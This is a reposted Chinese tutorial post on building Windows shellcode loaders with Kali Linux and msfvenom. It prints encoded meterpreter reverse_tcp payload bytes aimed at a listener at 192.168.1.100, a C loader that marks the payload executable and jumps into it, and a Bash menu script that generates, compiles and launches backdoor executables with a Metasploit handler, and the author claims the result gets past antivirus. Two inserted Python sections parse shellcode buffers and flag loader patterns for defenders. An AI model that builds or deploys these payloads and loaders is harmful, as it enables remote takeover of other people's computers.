Overview
This post was last edited by Demon123 on 2017-9-20 15:15.
http://www.secist.com/archives/4809.html
1. I have a bold idea
The inspiration for this shellcode post actually came from talking with 车王 (Chewang); it was under his guidance that I first learned
2. Unintended success (无心插柳柳成荫)
3. A shellcode that pops a "hello world" message box

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
    /* Position-independent x86 code: it locates kernel32 through the PEB,
       resolves GetProcAddress, loads user32 and calls MessageBoxA, then
       ExitProcess. It contains no 0x00 byte, which is why strlen() below
       sees its full length. */
    char *shellcode = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
                      "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
                      "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
                      "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
                      "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
                      "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
                      "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
                      "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
                      "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
                      "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
                      "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
                      "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
                      "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
                      "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
                      "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
                      "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"
                      "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"
                      "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"
                      "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"
                      "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0";
    /* VirtualProtect insists on a valid pointer for the old protection value;
       that is the only reason this variable exists. */
    DWORD why_must_this_variable;
    /* The literal lives in a read-only section, so its page must be made
       executable (RWX) before jumping into it. */
    BOOL ret = VirtualProtect (shellcode, strlen(shellcode),
                               PAGE_EXECUTE_READWRITE, &why_must_this_variable);
    if (!ret) {
        printf ("VirtualProtect\n");
        return EXIT_FAILURE;
    }
    printf("strlen(shellcode)=%lu\n", (unsigned long) strlen(shellcode));
    ((void (*)(void))shellcode)();
    return EXIT_SUCCESS;
}
```
Let's compile it by hand and see whether it really behaves as he said, i.e. pops a "hello world" box.
4. What we learned, and a look back at prior knowledge
The box says "hello world", yet the source contains neither a "hello world" string nor a MessageBox call: the code that matters is entirely in the hard-coded shellcode.
That reminded me of msfvenom shellcode, the malicious shellcode msfvenom generates, which can be emitted as a hard-coded C array. As for how msfvenom is used
5. shellcode_msfvenom
This post follows the msfvenom tutorial on www.offensive-security.com as its example.
```text
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai succeeded with size 353 (iteration=1)
x86/shikata_ga_nai succeeded with size 380 (iteration=2)
x86/shikata_ga_nai chosen with final size 380
Payload size: 380 bytes
buf = ""
buf += "\xbb\x78\xd0\x11\xe9\xda\xd8\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x59\x31\x58\x13\x83\xc0\x04\x03\x58\x77\x32"
buf += "\xe4\x53\x15\x11\xea\xff\xc0\x91\x2c\x8b\xd6\xe9\x94"
buf += "\x47\xdf\xa3\x79\x2b\x1c\xc7\x4c\x78\xb2\xcb\xfd\x6e"
buf += "\xc2\x9d\x53\x59\xa6\x37\xc3\x57\x11\xc8\x77\x77\x9e"
buf += "\x6d\xfc\x58\xba\x82\xf9\xc0\x9a\x35\x72\x7d\x01\x9b"
buf += "\xe7\x31\x16\x82\xf6\xe2\x89\x89\x75\x67\xf7\xaa\xae"
buf += "\x73\x88\x3f\xf5\x6d\x3d\x9e\xab\x06\xda\xff\x42\x7a"
buf += "\x63\x6b\x72\x59\xf6\x58\xa5\xfe\x3f\x0b\x41\xa0\xf2"
buf += "\xfe\x2d\xc9\x32\x3d\xd4\x51\xf7\xa7\x56\xf8\x69\x08"
buf += "\x4d\x27\x8a\x2e\x19\x99\x7c\xfc\x63\xfa\x5c\xd5\xa8"
buf += "\x1f\xa8\x9b\x88\xbb\xa5\x3c\x8f\x7f\x38\x45\xd1\x71"
buf += "\x34\x59\x84\xb0\x97\xa0\x99\xcc\xfe\x7f\x37\xe2\x28"
buf += "\xea\x57\x01\xcf\xf8\x1e\x1e\xd8\xd3\x05\x67\x73\xf9"
buf += "\x32\xbb\x76\x8c\x7c\x2f\xf6\x29\x0f\xa5\x36\x2e\x73"
buf += "\xde\x31\xc3\xfe\xae\x49\x64\xd2\x39\xf1\xf2\xc7\xa0"
buf += "\x06\xd3\xf6\x1a\xfe\x0a\xfe\x28\xbe\x1a\x42\x9c\xde"
buf += "\x01\x16\x27\xbd\x29\x1c\xf8\x7d\x47\x2c\x68\x06\x0e"
buf += "\x23\x31\xfe\x7d\x58\xe8\x7b\x76\x4b\xfe\xdb\x17\x51"
buf += "\xfa\xdf\xff\xa1\xbc\xc5\x66\x4b\xea\x23\x86\x47\xb4"
buf += "\xe7\xd5\x71\x77\x2e\x24\x4a\x3d\xb1\x6f\x12\xf2\xb2"
buf += "\xd0\x55\xc9\x23\x2e\xc2\xa5\x73\xb2\xc8\xb7\x7d\x6b"
buf += "\x55\x29\xbc\x26\xdd\xf6\xe3\xf6\x25\xc6\x5c\xad\x9c"
buf += "\x9d\x18\x08\x3b\xbf\xd2\xff\x92\x18\x5f\x48\x9b\xe0"
buf += "\x7b\x03\xa5\x32\x11\x27\x2b\x25\xcd\x44\xdb\xbd\xb9"
buf += "\xcd\x48\xda\x56\x4c\x56\xd5\x04\x87\x48\x3a\x6b\x9c"
buf += "\x2a\x15\x4d\xbc\x0b\x56\x06\xb5\xc9\x46\xd0\xfa\x68"
buf += "\xa6\x76\xe9\x52\x2c\x24\x62\x28\xe1\x1d\x87\xb0\x66"
buf += "\x93\x85\x8f\x87\x0f\xcf\x16\x29\x76\x03\x55\x0c\x0e"
buf += "\x3f\x17\xac"
```
As you can see, msfvenom generates the malicious shellcode for us. -a is the target architecture, e.g. x86.
--platform is the target machine's platform, e.g. Windows.
-p is the MSF payload. -e and -b concern the encoder: -e selects the encoder, and -b removes 0x00 from the hard-coded bytes, because 0x00 is the string terminator and therefore must not appear anywhere in the buffer.
Finally, -i and -f are the number of encoding iterations and the output format.
Now let's rework the command for what we actually need: a meterpreter payload, a chosen IP and port, and a chosen output format such as C or Python:

```sh
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -e x86/shikata_ga_nai -b '\x00' -i <iterations> -f c
```
In short:
-p sets the payload to windows/meterpreter/reverse_tcp
LHOST and LPORT set the attacker's IP and port
-e selects the x86/shikata_ga_nai encoder
-i sets the iteration count, e.g. 5 or 10
-f selects the output format, e.g. C code, Python, or another format
The formats -f supports are listed in msfvenom's help output.
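The two output formats shown in this section (-f python above, -f c below) both carry the payload as a run of double-quoted "\xNN" string literals, and the -b '\x00' argument matters because the loaders in this post size the buffer with strlen(). The following Python is an added example (mine, not part of the original post or of msfvenom): it parses either format back into bytes, reports the length strlen() would see next to the real length, and computes the buffer's Shannon entropy, which is the kind of measurement a defender uses to flag encoded blobs. All function names and the sample inputs are constructed for the example; the sample bytes are arbitrary and are not a payload.

```python
import math
import re

# One double-quoted string literal whose body is made only of \xNN escapes,
# the shape msfvenom emits for both "-f c" and "-f python".
_STRING_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
_HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')


def extract_shellcode(text: str) -> bytes:
    """Decode the payload bytes from msfvenom '-f c' or '-f python' text.

    Everything outside the quoted \\xNN literals (the "unsigned char buf[] ="
    header, the Python "buf += " prefixes, the size lines) is ignored, which
    is what the sed step later in this post does by hand for the C format.
    """
    out = bytearray()
    for body in _STRING_LITERAL.findall(text):
        out.extend(int(h, 16) for h in _HEX_ESCAPE.findall(body))
    return bytes(out)


def c_string_length(data: bytes) -> int:
    """What strlen() reports for this buffer: the bytes before the first NUL."""
    nul = data.find(b"\x00")
    return len(data) if nul < 0 else nul


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8); encoded stagers sit near the top of that range."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def audit(text: str) -> dict:
    """Summarise a generated buffer: real size, strlen() size, NULs, entropy."""
    data = extract_shellcode(text)
    return {
        "length": len(data),
        "strlen_length": c_string_length(data),
        "has_null": b"\x00" in data,
        "entropy": round(shannon_entropy(data), 3),
    }


# Constructed sample in "-f c" shape; the bytes are arbitrary, not a payload.
SAMPLE_C = (
    "Payload size: 8 bytes\n"
    "unsigned char buf[] =\n"
    '"\\x90\\x90\\x31\\xc0"\n'
    '"\\x50\\x68\\x41\\x42";\n'
)
# Same shape, but as if generated without -b '\x00': a NUL sits mid-buffer,
# so a strlen()-sized loader would only ever see the first two bytes.
SAMPLE_C_WITH_NULL = 'unsigned char buf[] =\n"\\x41\\x42\\x00\\x43\\x44";\n'
# Constructed "-f python" output.
SAMPLE_PY = 'buf = ""\nbuf += "\\x41\\x42"\nbuf += "\\x43"\n'

if __name__ == "__main__":
    for name, sample in [("c", SAMPLE_C), ("c+nul", SAMPLE_C_WITH_NULL), ("python", SAMPLE_PY)]:
        print(name, audit(sample))
```

The "strlen_length" field is the check worth keeping: if it is shorter than "length", the buffer contains a NUL and a loader that passes strlen() to VirtualProtect will protect, and execute, only a prefix of it.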
6. shellcode_c_msf
Finally we get the C-format shellcode from msfvenom:
```text
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 4 -f c
Found 1 compatible encoders
Attempting to encode payload with 4 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai chosen with final size 441
Payload size: 441 bytes
Final size of c file: 1878 bytes
unsigned char buf[] =
"\xd9\xe1\xbf\xc4\xbd\x41\x38\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x68\x31\x7e\x19\x83\xee\xfc\x03\x7e\x15\x26\x48\x9a\xec\x1c"
"\x99\x40\x70\xdd\x07\x0e\xae\xe9\xe6\xc6\x67\xa0\x76\x28\x2e"
"\xd8\x7b\x1c\xd4\x5f\x95\x5c\x0a\x80\xed\x24\xaf\x55\xee\xe0"
"\xf9\x80\x7f\x1a\x88\x1f\xde\xba\xa7\x09\x17\x25\x1f\x2c\x37"
"\x5d\x53\x6c\x7a\x01\xd2\x99\x69\x5b\x61\x14\x0a\xe1\x2b\xe1"
"\x62\x0c\x07\x9b\x67\xe4\x56\x2f\xf8\xa0\x7e\xdd\xfe\x6d\x0f"
"\xa2\x0e\xfc\x24\xcd\xce\xc0\xa3\x8b\x96\xe5\x1b\x26\xbd\x58"
"\x8d\xcc\x2b\x71\xe4\x37\xda\xb7\xca\x2e\xe1\xe2\x19\xd9\xbf"
"\x29\x5c\xed\x2b\x32\x0f\x9f\x81\x59\xf9\x3b\x31\x57\xe1\x38"
"\x75\x55\xa9\xa8\x30\x8e\xa2\x1e\x9e\x65\xaa\x5f\xe7\x43\xc7"
"\x1e\x06\xc7\x6d\x0f\xb8\x09\xf1\xa7\xaa\x3e\x82\xb0\xf5\x7e"
"\xf6\x08\xe1\x90\xc5\x98\xd0\x11\xe9\x78\xd6\xa6\x44\xf4\x1a"
"\xe9\x7d\x83\xec\x57\xd9\xb5\x80\x0b\x5f\x98\xc8\xec\xeb\x3f"
"\x09\x17\xc8\xad\x8a\x5f\xc6\x6f\x8f\xa3\x11\x7c\x7c\x3e\x25"
"\x44\x62\xbd\xd3\x94\xe8\x0b\x3e\xd9\xbe\x05\x71\x89\x98\x6b"
"\xe3\x4a\x36\x34\x9e\xa6\x90\xee\x69\x13\x16\xa0\x9a\xf5\x68"
"\x53\x22\xdc\x6f\x59\x54\x53\x8a\x25\x31\x40\x3e\x03\x85\xc9"
"\x3b\x1c\xb9\xb1\x6b\xe9\x42\xec\xda\x5f\x24\x8a\x81\x37\x90"
"\xe3\xb0\xe8\xd7\xfe\x8e\xfc\x0b\xc4\xde\x75\x73\x40\x14\x24"
"\x2c\x03\xf0\xfd\x65\x7c\xbf\xe8\xd3\xa2\x80\x16\xd1\x32\x36"
"\x36\x30\x1e\x71\x4f\xe9\x60\x47\x91\xcf\x0c\xf0\xeb\xc3\xe6"
"\xbf\x98\x1a\x3a\x38\xfa\x56\x40\x9e\x4e\x51\xc2\xcb\xc2\x48"
"\xe5\xbf\x0d\xec\xb2\x37\x01\x9f\x7a\xdf\x3a\xde\x30\xe0\x04"
"\xb6\x07\x5e\x5c\x65\x1c\xfd\x24\x02\xbd\x8f\x2c\xba\xdc\xbd"
"\x27\x2a\xe0\x08\x74\xf9\xda\x8b\x4a\xaf\x46\xaf\x67\xd1\x42"
"\x9d\xb5\x11\x70\xd7\x5c\xf0\x36\x1f\x87\x42\x99\xa4\x57\x64"
"\x8f\xf7\xda\x03\x42\x35\x85\x6e\xd5\x6b\xa6\xcd\xdb\x8c\x2f"
"\x37\x62\xef\xfe\x61\xab\xeb\xde\x37\xd8\x5e\x77\x7f\x86\x18"
"\x88\x80\xd4\x02\xe7\x8b";
```
7. Compile, listen, run
Now that we have the msfvenom-generated shellcode, we drop it into the earlier hello-world popup program and get the following:
```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
    char *shellcode =
    /* the shellcode generated by msfvenom above */
    "\xd9\xe1\xbf\xc4\xbd\x41\x38\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
    "\x68\x31\x7e\x19\x83\xee\xfc\x03\x7e\x15\x26\x48\x9a\xec\x1c"
    "\x99\x40\x70\xdd\x07\x0e\xae\xe9\xe6\xc6\x67\xa0\x76\x28\x2e"
    "\xd8\x7b\x1c\xd4\x5f\x95\x5c\x0a\x80\xed\x24\xaf\x55\xee\xe0"
    "\xf9\x80\x7f\x1a\x88\x1f\xde\xba\xa7\x09\x17\x25\x1f\x2c\x37"
    "\x5d\x53\x6c\x7a\x01\xd2\x99\x69\x5b\x61\x14\x0a\xe1\x2b\xe1"
    "\x62\x0c\x07\x9b\x67\xe4\x56\x2f\xf8\xa0\x7e\xdd\xfe\x6d\x0f"
    "\xa2\x0e\xfc\x24\xcd\xce\xc0\xa3\x8b\x96\xe5\x1b\x26\xbd\x58"
    "\x8d\xcc\x2b\x71\xe4\x37\xda\xb7\xca\x2e\xe1\xe2\x19\xd9\xbf"
    "\x29\x5c\xed\x2b\x32\x0f\x9f\x81\x59\xf9\x3b\x31\x57\xe1\x38"
    "\x75\x55\xa9\xa8\x30\x8e\xa2\x1e\x9e\x65\xaa\x5f\xe7\x43\xc7"
    "\x1e\x06\xc7\x6d\x0f\xb8\x09\xf1\xa7\xaa\x3e\x82\xb0\xf5\x7e"
    "\xf6\x08\xe1\x90\xc5\x98\xd0\x11\xe9\x78\xd6\xa6\x44\xf4\x1a"
    "\xe9\x7d\x83\xec\x57\xd9\xb5\x80\x0b\x5f\x98\xc8\xec\xeb\x3f"
    "\x09\x17\xc8\xad\x8a\x5f\xc6\x6f\x8f\xa3\x11\x7c\x7c\x3e\x25"
    "\x44\x62\xbd\xd3\x94\xe8\x0b\x3e\xd9\xbe\x05\x71\x89\x98\x6b"
    "\xe3\x4a\x36\x34\x9e\xa6\x90\xee\x69\x13\x16\xa0\x9a\xf5\x68"
    "\x53\x22\xdc\x6f\x59\x54\x53\x8a\x25\x31\x40\x3e\x03\x85\xc9"
    "\x3b\x1c\xb9\xb1\x6b\xe9\x42\xec\xda\x5f\x24\x8a\x81\x37\x90"
    "\xe3\xb0\xe8\xd7\xfe\x8e\xfc\x0b\xc4\xde\x75\x73\x40\x14\x24"
    "\x2c\x03\xf0\xfd\x65\x7c\xbf\xe8\xd3\xa2\x80\x16\xd1\x32\x36"
    "\x36\x30\x1e\x71\x4f\xe9\x60\x47\x91\xcf\x0c\xf0\xeb\xc3\xe6"
    "\xbf\x98\x1a\x3a\x38\xfa\x56\x40\x9e\x4e\x51\xc2\xcb\xc2\x48"
    "\xe5\xbf\x0d\xec\xb2\x37\x01\x9f\x7a\xdf\x3a\xde\x30\xe0\x04"
    "\xb6\x07\x5e\x5c\x65\x1c\xfd\x24\x02\xbd\x8f\x2c\xba\xdc\xbd"
    "\x27\x2a\xe0\x08\x74\xf9\xda\x8b\x4a\xaf\x46\xaf\x67\xd1\x42"
    "\x9d\xb5\x11\x70\xd7\x5c\xf0\x36\x1f\x87\x42\x99\xa4\x57\x64"
    "\x8f\xf7\xda\x03\x42\x35\x85\x6e\xd5\x6b\xa6\xcd\xdb\x8c\x2f"
    "\x37\x62\xef\xfe\x61\xab\xeb\xde\x37\xd8\x5e\x77\x7f\x86\x18"
    "\x88\x80\xd4\x02\xe7\x8b";
    /* receives the previous protection; VirtualProtect needs a valid pointer */
    DWORD why_must_this_variable;
    /* strlen() is only a valid size because -b '\x00' kept NUL out of the buffer */
    BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
                              PAGE_EXECUTE_READWRITE, &why_must_this_variable);
    if (!ret) {
        printf("VirtualProtect\n");
        return EXIT_FAILURE;
    }
    ((void(*)(void))shellcode)();
    return 0;
}
```
You can compile with Microsoft's VS compiler or, as I do, with TDM-GCC. TDM-GCC complains while building, but that does not stop us from getting a session in the end.
Of the flags, -m32 means a 32-bit build, and -W -Wall means ignore warnings; the rest needs no explanation.
You can also build the exe with VS.
Below is the result I got compiling and running it on Windows; it likewise got past the antivirus protection.
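Seen from the defender's side, the loader above has a very recognisable shape: a large string literal of "\xNN" escapes, a VirtualProtect call, the PAGE_EXECUTE_READWRITE constant, and a char buffer cast to a function pointer and called. The following Python is an added example (mine, not from the original post) that scores C source or build scripts against exactly those four indicators, the way a triage rule would; the indicator names, threshold and sample files are constructed for the example, and the loader-shaped sample uses 80 bytes of 0x41 instead of any real payload.

```python
import re

# Building blocks of the loader pattern shown on this page.
INDICATORS = {
    "virtualprotect_call": re.compile(r"\bVirtualProtect\s*\("),
    "rwx_protection": re.compile(r"\bPAGE_EXECUTE_READWRITE\b"),
    # ((void (*)(void)) name)()  with arbitrary whitespace
    "cast_and_call": re.compile(
        r"\(\s*\(\s*void\s*\(\s*\*\s*\)\s*\(\s*void\s*\)\s*\)\s*\w+\s*\)\s*\(\s*\)"),
}
_HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
BLOB_THRESHOLD = 64  # escapes; the stagers on this page are 380-441 bytes


def scan_source(text: str) -> dict:
    """Return each matched indicator with the 1-based line of its first hit,
    plus the total count of \\xNN escapes in the file."""
    hits = {}
    for name, rx in INDICATORS.items():
        m = rx.search(text)
        if m:
            hits[name] = text.count("\n", 0, m.start()) + 1
    escapes = _HEX_ESCAPE.findall(text)
    if len(escapes) >= BLOB_THRESHOLD:
        first = _HEX_ESCAPE.search(text)
        hits["hex_escape_blob"] = text.count("\n", 0, first.start()) + 1
    return {"hits": hits, "hex_escape_count": len(escapes)}


def verdict(report: dict) -> str:
    """Blob + RWX + cast-and-call together is the loader; two indicators
    alone are worth a look; anything less is treated as clean."""
    hits = set(report["hits"])
    if {"hex_escape_blob", "rwx_protection", "cast_and_call"} <= hits:
        return "shellcode-loader"
    if len(hits) >= 2:
        return "suspicious"
    return "clean"


# Constructed benign C file.
BENIGN_SOURCE = '''#include <stdio.h>
int main(void) {
    printf("hello\\n");
    return 0;
}
'''
# Constructed loader-shaped file: the skeleton of the page's loader, but the
# buffer is 80 bytes of 'A' (0x41), not a payload.
LOADER_SOURCE = (
    "#include <windows.h>\n"
    "int main(void) {\n"
    "    char *shellcode =\n"
    + "".join('    "' + "\\x41" * 16 + '"\n' for _ in range(5))
    + "    ;\n"
    "    DWORD old;\n"
    "    VirtualProtect(shellcode, 80, PAGE_EXECUTE_READWRITE, &old);\n"
    "    ((void (*)(void))shellcode)();\n"
    "    return 0;\n"
    "}\n"
)

if __name__ == "__main__":
    for label, src in [("benign", BENIGN_SOURCE), ("loader", LOADER_SOURCE)]:
        report = scan_source(src)
        print(label, verdict(report), report)
```

The line numbers in the report point an analyst straight at the relevant statements; on the page's own loader all four indicators fire, and the script in section 9 would also trip "hex_escape_blob" on the shellcode.txt and shellcode.cpp files it writes.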
8. Turning the idea into a lazy-man's automation script in Bash
We need to think about a few things: how to get the generated shellcode into the cpp file,
and how to take the IP and port and have everything done for us automatically.
First, how do we get the generated shellcode into the cpp file?
We can combine echo with $(...) command substitution and redirect the result into a scratch file, like this:
```sh
echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 4 -f c) >> shellcode.txt
```

Can we drop that scratch file straight into the cpp? Not quite: attentive readers will notice that shellcode.txt also contains the string `unsigned char buf[] =`. So we need one more command, sed, to delete that string (the square brackets must be escaped, since to sed `[]` opens a bracket expression):

```sh
sed 's/unsigned char buf\[\] =//g'
```

Full command:

```sh
echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 4 -f c) | sed 's/unsigned char buf\[\] =//g' >> shellcode.txt
```

That solves the first problem, storing the msfvenom shellcode in a scratch file. How do we produce the complete cpp file?
```sh
# msfvenom prints its progress to stderr, so only the C array reaches sed
echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 4 -f c) | sed 's/unsigned char buf\[\] =//g' >> shellcode.txt
Shellcode=$(cat shellcode.txt)
mkdir -p output
# Unquoted heredoc: $Shellcode expands, while the C source's own double quotes
# need no escaping (inside echo "..." they would have ended the string early).
cat >> output/shellcode.cpp <<EOF
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
    char *shellcode =
    $Shellcode
    DWORD why_must_this_variable;
    BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
                              PAGE_EXECUTE_READWRITE, &why_must_this_variable);
    if (!ret) {
        printf("VirtualProtect\n");
        return EXIT_FAILURE;
    }
    ((void(*)(void))shellcode)();
    return 0;
}
EOF
```
We cat the shellcode.txt we produced, store its contents in a variable (I use $Shellcode), and substitute that variable into the C code; this outputs the complete source file we want to compile.
Next, how do we take the IP and port and have everything done automatically? In bash we use read, which accepts a string typed by the user. We can write it like this:

```sh
echo -e " secist>请输入你的ip地址: \c"
read ip
echo -e " secist>请输入你的端口: \c"
read port
echo -e " secist>编码次数(1-500): \c"
read encode
```

These store the IP address, port and encoder iteration count in the ip, port and encode variables respectively.
9. The full picture
In the end my complete script is:
```sh
shellcode() {
    clear
    echo -e " < Shellcode Payload >"
    echo -e " --------------------"
    echo '        ^__^'
    echo '        (oo)\_______'
    echo '        (__)\       )\/\'
    echo '            ||----w |'
    echo '            ||     ||'
    echo " "
    echo -e " +------------++-------------------------++-----------------------+"
    echo " 即刻安全周年庆版v1.7 (secist----2017.7.14)"
    echo " "
    echo -e " 你的IP地址 :\c"
    /sbin/ifconfig -a | grep inet | grep -v 127.0.0.1 | grep -v inet6 | awk '{print $2}' | tr -d "addr:"
    echo " 系统版本 :$(cat /etc/issue)"
    echo -e " +------------++-------------------------++-----------------------+"
    echo " "
    echo " [1] Meterpreter_Reverse_tcp       [5] Shell_reverse_tcp"
    echo " [2] Meterpreter_Reverse_http      [6] exit"
    echo " [3] Meterpreter_Reverse_https"
    echo " [4] Meterpreter_Reverse_tcp_dns"
    echo " [7] back menu"
    echo ""
    echo -e " secist> \c"
    read option
    # Pick the payload. The original followed this case with an if/elif chain
    # that repeated the same dispatch (and, after the "*)" re-prompt, ran
    # shellcode1 a second time); the dispatch is folded into the case instead.
    case $option in
        1)
            payload='windows/meterpreter/reverse_tcp'
            shellcode1
            ;;
        2)
            payload='windows/meterpreter/reverse_http'
            shellcode1
            ;;
        3)
            payload='windows/meterpreter/reverse_https'
            shellcode1
            ;;
        4)
            payload='windows/meterpreter/reverse_tcp_dns'
            shellcode1
            ;;
        5)
            payload='windows/shell/reverse_tcp'
            shellcode1
            ;;
        6)
            exit
            ;;
        7)
            # menu is defined elsewhere in the author's full script (not shown on this page)
            menu
            ;;
        *)
            shellcode
            ;;
    esac
}

shellcode1() {
    # prompts for the listener address, port and encoder iteration count
    echo -e " secist>请输入你的ip地址: \c"
    read ip
    echo -e " secist>请输入你的端口: \c"
    read port
    echo -e " secist>编码次数(1-500): \c"
    read encode
    mkdir -p output resource
    # msfvenom prints progress to stderr, so only the C array reaches sed, which
    # strips the "unsigned char buf[] =" prefix. "-p $payload" uses the menu
    # choice; the original hard-coded reverse_tcp here, which did not match the
    # handler written below for the other menu entries.
    echo $(msfvenom -a x86 --platform Windows -p "$payload" LHOST="$ip" LPORT="$port" -e x86/shikata_ga_nai -b '\x00' -i "$encode" -f c) | sed 's/unsigned char buf\[\] =//g' >> output/shellcode.txt
    Shellcode=$(cat output/shellcode.txt)
    # unquoted heredoc: $Shellcode expands, the C source's quotes need no escaping
    cat >> output/shellcode.cpp <<EOF
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
    char *shellcode =
    $Shellcode
    DWORD why_must_this_variable;
    BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
                              PAGE_EXECUTE_READWRITE, &why_must_this_variable);
    if (!ret) {
        printf("VirtualProtect\n");
        return EXIT_FAILURE;
    }
    ((void(*)(void))shellcode)();
    return 0;
}
EOF
    wine gcc -m32 -W -Wall -o output/shellcode.exe output/shellcode.cpp
    rm output/shellcode.txt output/shellcode.cpp
    echo -e " +------------++-------------------------++-----------------------+"
    echo -e " | Name       || Descript                || Your Input            "
    echo -e " +------------++-------------------------++-----------------------+"
    echo -e " | LHOST      || The Listen Addres       || $ip"
    echo -e " | LPORT      || The Listen Ports        || $port"
    echo -e " | OUTPUTNAME || The Filename output     || output/shellcode.exe"
    echo -e " +------------++-------------------------++-----------------------+"
    # overwrite the resource file, so earlier runs' lines do not pile up
    echo "use exploit/multi/handler" > resource/handler.rc
    echo "set PAYLOAD $payload" >> resource/handler.rc
    echo "set LHOST $ip" >> resource/handler.rc
    echo "set LPORT $port" >> resource/handler.rc
    echo "exploit " >> resource/handler.rc
    msfconsole -r resource/handler.rc
}
```
*I have uploaded the script files to GitHub; feel free to download them. I also hope you will keep following 即刻安全 (secist) in the future. Thanks!
Source: "kali 如何编写shell_我的shellcode编写之路" (How to write shell on Kali: my road to writing shellcode) | MSF | Shellcode | Kali Linux 2017, 白帽子技术/思路 section, i春秋社区; collected and reposted by 端庄背包 on 靠谱客.